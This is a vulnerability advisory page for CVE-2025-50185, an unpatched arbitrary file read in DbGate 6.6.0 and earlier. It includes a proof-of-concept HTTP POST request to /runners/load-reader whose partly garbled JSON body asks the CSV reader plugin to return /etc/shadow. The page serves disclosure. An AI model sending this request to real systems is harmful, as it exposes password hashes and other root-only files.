CVE-2025-50185 Information

Jul 27, 2025 cve

Description

DbGate is cross-platform database manager. In versions 6.6.0 and below DbGate allows unauthorized file access due to insufficient validation of file paths and types. A user with application-level access can retrieve data from arbitrary files on the system regardless of their location or file type. The plugin fails to enforce proper checks on content type and file extension before reading a file. As a result even sensitive files accessible only to the root user can be read through the application interface. There is currently no fix for this issue.

POST /runners/load-reader HTTP/1.1
Host: <REPLACE ME>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: /
Accept-Language: en-USen;q=0.5
Accept-Encoding: gzip deflate br
Referer: <REPLACE ME>
Content-Type: application/json
Authorization: Bearer <REPLACE ME>
Content-Length: 127
Origin: http://192.168.124.119:3000
Connection: keep-alive
Cookie: <REPLACE ME>
Priority: u=0
Cache-Control: max-age=0

unctionName\:
eader@dbgate-plugin-csv\props\:ileName\:\/etc\/shadow\limitRows\:100

The request payload: Screenshot From 2025-05-31 22-54-49

Lines of the file being returned: Screenshot From 2025-05-31 22-55-23

Reference

https://github.com/dbgate/dbgate/blob/v6.6.0/plugins/dbgate-plugin-csv/src/backend/reader.js#L71-L102 https://github.com/dbgate/dbgate/security/advisories/GHSA-7x75-fmx7-q6h9

CNNVD-202507-3360 (Published: 2025-07-26)

Share on: